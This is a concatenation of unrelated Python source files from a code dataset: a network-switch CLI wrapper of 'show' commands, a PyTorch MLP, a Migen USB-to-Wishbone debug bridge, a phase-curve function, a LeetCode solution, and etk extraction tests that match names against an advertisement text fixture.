self.execute( cmd= "show mc "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_cfm(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show cfm "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_ntp(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show ntp "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_ssh(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show ssh "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_qos(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show qos "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_cpu(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show cpu "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_vlan(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show vlan "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_lldp(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show lldp "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_dhcp(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show dhcp "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_axrp(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show axrp "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_oadp(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show oadp "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_gsrp(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show gsrp "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_port(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show port "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_file(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show file "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_power(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show power "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_clock(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show clock "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_dot1x(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show dot1x "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_sflow(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show sflow "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_track(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show track "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_flash(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show flash "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_system(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show system "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_whoami(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show whoami "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_efmoam(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show efmoam "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_memory(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show memory "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_tcpdump(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show tcpdump "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_history(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show history "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_logging(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show logging "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_license(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show license "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_netstat(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show netstat "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_version(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show version "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_netconf(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show netconf "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_ipdual(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show ip-dual "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_sessions(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show sessions "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_qosflow(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show qos-flow "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_openflow(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show openflow "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_dumpfile(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show dumpfile "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_ipv6dhcp(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show ipv6-dhcp "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_processes(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show processes "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_vrrpstatus(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show vrrpstatus "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_interfaces(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show interfaces "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_environment(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show environment "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_autoconfig(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show auto-config "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_techsupport(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show tech-support "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_mldsnooping(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show mld-snooping "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_igmpsnooping(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show igmp-snooping "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_channelgroup(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show channel-group "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_spanningtree(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show spanning-tree "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_loopdetection(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show loop-detection "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_acknowledgments(self, *options, **def_args ):
'''Possible Options :[' interface ']'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show acknowledgments "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_macaddresstable(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show mac-address-table "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_configlockstatus(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show config-lock-status "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_acknowledgments_interface(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show acknowledgments interface "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
| StarcoderdataPython |
10937 | <filename>src/models/layers/feature.py
import torch
import torch.nn as nn
class MLP(nn.Module):
def __init__(self, num_features, hidden_sizes, dropout):
super().__init__()
self.layers = nn.ModuleList(
[nn.Linear(num_features, hidden_sizes[0])] +
[nn.Linear(hidden_sizes[i], hidden_sizes[i + 1]) for i in range(len(hidden_sizes) - 1)]
)
self.activation = nn.ReLU()
self.dropout = nn.Dropout(p=dropout)
def forward(self, x):
for layer in self.layers:
x = layer(x)
x = self.activation(x)
x = self.dropout(x)
        return x
| StarcoderdataPython |
1747135 | <filename>valentyusb/usbcore/cpu/usbwishbonebridge.py<gh_stars>10-100
from migen import *
from migen.genlib.misc import chooser, WaitTimer
from migen.genlib.record import Record
from migen.genlib.fsm import FSM, NextState
from litex.soc.interconnect import wishbone
from litex.soc.interconnect import stream
from ..pid import PID, PIDTypes
class USBWishboneBridge(Module):
def __init__(self, usb_core, clk_freq=12000000, magic_packet=0x43):
self.wishbone = wishbone.Interface()
# # #
byte_counter = Signal(3, reset_less=True)
byte_counter_reset = Signal()
byte_counter_ce = Signal()
self.sync += \
If(byte_counter_reset,
byte_counter.eq(0)
).Elif(byte_counter_ce,
byte_counter.eq(byte_counter + 1)
)
# Unlike the UART or Ethernet bridges, we explicitly only
# support two commands: reading and writing. This gets
# integrated into the USB protocol, so it's not really a
# state. 1 is "USB Device to Host", and is therefore a "read",
# while 0 is "USB Host to Device", and is therefore a "write".
cmd = Signal(1, reset_less=True)
cmd_ce = Signal()
# Instead of self.source and self.sink, we let the wrapping
# module handle packing and unpacking the data.
self.sink_data = Signal(8)
# True when the "sink" value has data
self.sink_valid = Signal()
self.send_ack = Signal()
# Indicates whether a "debug" packet is currently being processed
self.n_debug_in_progress = Signal()
address = Signal(32, reset_less=True)
address_ce = Signal()
data = Signal(32, reset_less=True)
rx_data_ce = Signal()
tx_data_ce = Signal()
self.sync += [
If(cmd_ce, cmd.eq(usb_core.data_recv_payload[7:8])),
If(address_ce, address.eq(Cat(address[8:32], usb_core.data_recv_payload))),
If(rx_data_ce,
data.eq(Cat(data[8:32], usb_core.data_recv_payload))
).Elif(tx_data_ce,
data.eq(self.wishbone.dat_r)
)
]
fsm = ResetInserter()(FSM(reset_state="IDLE"))
self.submodules += fsm
fsm.act("IDLE",
self.n_debug_in_progress.eq(1),
If(usb_core.data_recv_put,
If(usb_core.tok == PID.SETUP,
If(usb_core.endp == 0,
# If we get a SETUP packet with a "Vendor" type
# going to this device, treat that as a DEBUG packet.
cmd_ce.eq(1),
byte_counter_reset.eq(1),
If(usb_core.data_recv_payload[0:7] == magic_packet,
NextState("RECEIVE_ADDRESS"),
).Else(
# Wait for the end of the packet, to avoid
# messing with normal USB operation
NextState("WAIT_PKT_END"),
),
)
)
)
)
# The target address comes as the wValue and wIndex in the SETUP
# packet. Once we get that data, we're ready to do the operation.
fsm.act("RECEIVE_ADDRESS",
If(usb_core.data_recv_put,
byte_counter_ce.eq(1),
If((byte_counter >= 1),
If((byte_counter <= 4),
address_ce.eq(1),
),
),
),
# We don't need to explicitly ACK the SETUP packet, because
# they're always acknowledged implicitly. Wait until the
# packet ends (i.e. until we've sent the ACK packet) before
# moving to the next state.
If(usb_core.end,
byte_counter_reset.eq(1),
If(cmd,
NextState("READ_DATA")
).Else(
NextState("RECEIVE_DATA")
),
),
)
fsm.act("RECEIVE_DATA",
# Set the "ACK" bit to 1, so we acknowledge the packet
# once it comes in, and so that we're in a position to
# receive data.
If(usb_core.endp == 0,
self.send_ack.eq(1),
If(usb_core.data_recv_put,
rx_data_ce.eq(1),
byte_counter_ce.eq(1),
If(byte_counter == 3,
NextState("WAIT_RECEIVE_DATA_END"),
byte_counter_reset.eq(1)
).Elif(usb_core.end,
# NextState("WAIT_SEND_ACK_START"),
NextState("WRITE_DATA"),
byte_counter_reset.eq(1)
)
)
)
)
fsm.act("WAIT_RECEIVE_DATA_END",
self.send_ack.eq(1),
# Wait for the end of the USB packet, if
# it hasn't come already.
If(usb_core.end,
# NextState("WAIT_SEND_ACK_START")
NextState("WRITE_DATA")
)
)
self.comb += [
# Trim off the last two bits of the address, because wishbone addresses
# are word-based, and a word is 32-bits. Therefore, the last two bits
# should always be zero.
self.wishbone.adr.eq(address[2:]),
self.wishbone.dat_w.eq(data),
self.wishbone.sel.eq(2**len(self.wishbone.sel) - 1)
]
fsm.act("WRITE_DATA",
byte_counter_reset.eq(1),
self.wishbone.stb.eq(1),
self.wishbone.we.eq(1),
self.wishbone.cyc.eq(1),
If(self.wishbone.ack | self.wishbone.err,
NextState("WAIT_SEND_ACK_START"),
)
)
fsm.act("READ_DATA",
byte_counter_reset.eq(1),
self.wishbone.stb.eq(1),
self.wishbone.we.eq(0),
self.wishbone.cyc.eq(1),
If(self.wishbone.ack | self.wishbone.err,
tx_data_ce.eq(1),
NextState("SEND_DATA_WAIT_START")
)
)
fsm.act("SEND_DATA_WAIT_START",
byte_counter_reset.eq(1),
If(usb_core.start,
NextState("SEND_DATA"),
),
)
self.comb += \
chooser(data, byte_counter, self.sink_data, n=4, reverse=False)
fsm.act("SEND_DATA",
If(usb_core.endp == 0,
# Keep sink_valid high during the packet, which indicates we have data
# to send. This also causes an "ACK" to be transmitted.
self.sink_valid.eq(1),
If(usb_core.data_send_get,
byte_counter_ce.eq(1),
),
If(byte_counter == 4,
NextState("WAIT_SEND_ACK_START")
),
If(usb_core.end,
NextState("WAIT_SEND_ACK_START")
)
).Else(
NextState("SEND_DATA_WAIT_START"),
)
)
# To validate the transaction was successful, the host will now
# send an "IN" request. Acknowledge that by setting
# self.send_ack, without putting anything in self.sink_data.
fsm.act("WAIT_SEND_ACK_START",
If(usb_core.endp == 0,
self.send_ack.eq(1),
If(usb_core.retry,
byte_counter_reset.eq(1),
NextState("SEND_DATA"),
).Elif(usb_core.start,
NextState("WAIT_PKT_END_DBG"),
)
)
)
fsm.act("WAIT_PKT_END_DBG",
self.send_ack.eq(1),
If(usb_core.end,
NextState("IDLE"),
)
)
fsm.act("WAIT_PKT_END",
self.n_debug_in_progress.eq(1),
If(usb_core.end,
NextState("IDLE"),
)
    )
| StarcoderdataPython |
1621438 | import numpy as np
def get_phaselc(t, p, data, v_num):
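    # Phase-curve model: a unity baseline plus first- and second-harmonic cosine
    # terms with amplitudes amp1/amp2, phase offsets theta1/theta2 and period per.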
    return (1. + p.amp1[v_num] * np.cos(2. * np.pi * (t - p.theta1[v_num]) / p.per[v_num])
            + p.amp2[v_num] * np.cos(4. * np.pi * (t - p.theta2[v_num]) / p.per[v_num]))
| StarcoderdataPython |
3399460 | #
# @lc app=leetcode id=572 lang=python3
#
# [572] Subtree of Another Tree
#
# @lc code=start
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def isSubtree(self, s, t):
if not s and not t:
return True
if not s or not t:
return False
return self.compare(s, t) or self.isSubtree(s.left, t) or self.isSubtree(s.right, t)
def compare(self, s, t):
if not s and not t:
return True
if not s or not t:
return False
return s.val == t.val and self.compare(s.right, t.right) and self.compare(s.left, t.left)
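# Worst-case time complexity is O(m * n) for trees of m and n nodes, since
# compare() may be called starting from every node of s.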
# @lc code=end
| StarcoderdataPython |
3366877 | <gh_stars>0
# -*- coding: utf-8 -*-
import unittest
import sys, os
sys.path.append('../../')
from etk.core import Core
import json
import codecs
class TestExtractionsInputPaths(unittest.TestCase):
def setUp(self):
file_path = os.path.join(os.path.dirname(__file__), "ground_truth/1_content_extracted.jl")
self.doc = json.load(codecs.open(file_path))
def test_invalid_json_path(self):
doc = {
"url": "http:www.hitman.org",
"doc_id": "19B0EAB211CD1D3C63063FAB0B2937043EA1F07B5341014A80E7473BA7318D9E",
"actors": {
"name": "agent 47",
"affiliation": "International Contract Agency"
}
}
e_config = {
"document_id": "doc_id",
"data_extraction": [
{
"input_path": [
"actors["
],
"fields": {
"actors": {
"extractors": {
"create_kg_node_extractor": {
"config": {
"segment_name": "actor_information"
}
}
}
}
}
}
]
}
c = Core(extraction_config=e_config)
with self.assertRaises(Exception):
r = c.process(doc)
def test_extraction_input_path(self):
women_name_file_path = os.path.join(os.path.dirname(__file__), "resources/female-names.json.gz")
e_config = {"document_id": "doc_id",
"resources": {
"dictionaries": {
"women_name": women_name_file_path
}
},
"data_extraction": [
{
"input_path": "*.*.text.`parent`"
,
"fields": {
"name": {
"extractors": {
"extract_using_dictionary": {
"config": {
"dictionary": "women_name",
"ngrams": 1,
"joiner": " ",
"pre_process": [
"x.lower()"
],
"pre_filter": [
"x"
],
"post_filter": [
"isinstance(x, basestring)"
]
},
"extraction_policy": "keep_existing"
},
"extract_using_regex": {
"config": {
"include_context": "true",
"regex": "(?:my[\\s]+name[\\s]+is[\\s]+([-a-z0-9@$!]+))",
"regex_options": [
"IGNORECASE"
],
"pre_filter": [
"x.replace('\\n', '')",
"x.replace('\\r', '')"
]
},
"extraction_policy": "replace"
}
}
}
}
}
]
}
c = Core(extraction_config=e_config)
r = c.process(self.doc)
self.assertTrue("content_extraction" in r)
self.assertTrue("content_strict" in r["content_extraction"])
self.assertTrue("text" in r["content_extraction"]["content_strict"])
self.assertTrue("simple_tokens_original_case" in r["content_extraction"]["content_strict"])
self.assertTrue("simple_tokens" in r["content_extraction"]["content_strict"])
self.assertTrue("content_relaxed" in r["content_extraction"])
self.assertTrue("text" in r["content_extraction"]["content_relaxed"])
self.assertTrue("simple_tokens_original_case" in r["content_extraction"]["content_relaxed"])
self.assertTrue("simple_tokens" in r["content_extraction"]["content_relaxed"])
self.assertTrue("title" in r["content_extraction"])
self.assertTrue("text" in r["content_extraction"]["title"])
self.assertTrue("simple_tokens_original_case" in r["content_extraction"]["title"])
self.assertTrue("simple_tokens" in r["content_extraction"]["title"])
self.assertTrue("knowledge_graph" in r)
self.assertTrue("name" in r["knowledge_graph"])
expected = [
{
"confidence": 1,
"provenance": [
{
"source": {
"segment": "content_relaxed",
"context": {
"start": 10,
"end": 11,
"input": "tokens",
"text": "27 \n my name is <etk 'attribute' = 'name'>helena</etk> height 160cms weight 55 kilos "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "helena"
},
{
"source": {
"segment": "content_relaxed",
"context": {
"start": 41,
"end": 58,
"input": "text",
"text": "91 27 \n <etk 'attribute' = 'name'>My name is Helena</etk> height 16"
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_regex",
"extracted_value": "Helena"
},
{
"source": {
"segment": "content_strict",
"context": {
"start": 10,
"end": 11,
"input": "tokens",
"text": "27 \n my name is <etk 'attribute' = 'name'>helena</etk> height 160cms weight 55 kilos "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "helena"
},
{
"source": {
"segment": "content_strict",
"context": {
"start": 41,
"end": 58,
"input": "text",
"text": "91 27 \n <etk 'attribute' = 'name'>My name is Helena</etk> height 16"
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_regex",
"extracted_value": "Helena"
}
],
"key": "helena",
"value": "helena"
},
{
"confidence": 1,
"provenance": [
{
"source": {
"segment": "content_relaxed",
"context": {
"start": 136,
"end": 137,
"input": "tokens",
"text": "\n hey i ' m <etk 'attribute' = 'name'>luna</etk> 3234522013 let ' s explore "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "luna"
},
{
"source": {
"segment": "content_strict",
"context": {
"start": 136,
"end": 137,
"input": "tokens",
"text": "\n hey i ' m <etk 'attribute' = 'name'>luna</etk> 3234522013 let ' s explore "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "luna"
},
{
"source": {
"segment": "title",
"context": {
"start": 9,
"end": 10,
"input": "tokens",
"text": "2013 escort alert ! - <etk 'attribute' = 'name'>luna</etk> the hot playmate ( 323 "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "luna"
}
],
"key": "luna",
"value": "luna"
}
]
results = r["knowledge_graph"]["name"]
        self.assertEqual(expected, results)
def test_extraction_multiple_input_paths(self):
women_name_file_path = os.path.join(os.path.dirname(__file__), "resources/female-names.json.gz")
e_config = {"document_id": "doc_id",
"resources": {
"dictionaries": {
"women_name": women_name_file_path
}
},
"data_extraction": [
{
"input_path": ["*.*.text.`parent`", "*.inferlink_extractions.*.text.`parent`"],
"fields": {
"name": {
"extractors": {
"extract_using_dictionary": {
"config": {
"dictionary": "women_name",
"ngrams": 1,
"joiner": " ",
"pre_process": [
"x.lower()"
],
"pre_filter": [
"x"
],
"post_filter": [
"isinstance(x, basestring)"
]
},
"extraction_policy": "keep_existing"
},
"extract_using_regex": {
"config": {
"include_context": "true",
"regex": "(?:my[\\s]+name[\\s]+is[\\s]+([-a-z0-9@$!]+))",
"regex_options": [
"IGNORECASE"
],
"pre_filter": [
"x.replace('\\n', '')",
"x.replace('\\r', '')"
]
},
"extraction_policy": "replace"
}
}
}
}
}
]
}
c = Core(extraction_config=e_config)
r = c.process(self.doc)
self.assertTrue("content_extraction" in r)
self.assertTrue("content_strict" in r["content_extraction"])
self.assertTrue("text" in r["content_extraction"]["content_strict"])
self.assertTrue("simple_tokens_original_case" in r["content_extraction"]["content_strict"])
self.assertTrue("simple_tokens" in r["content_extraction"]["content_strict"])
self.assertTrue("content_relaxed" in r["content_extraction"])
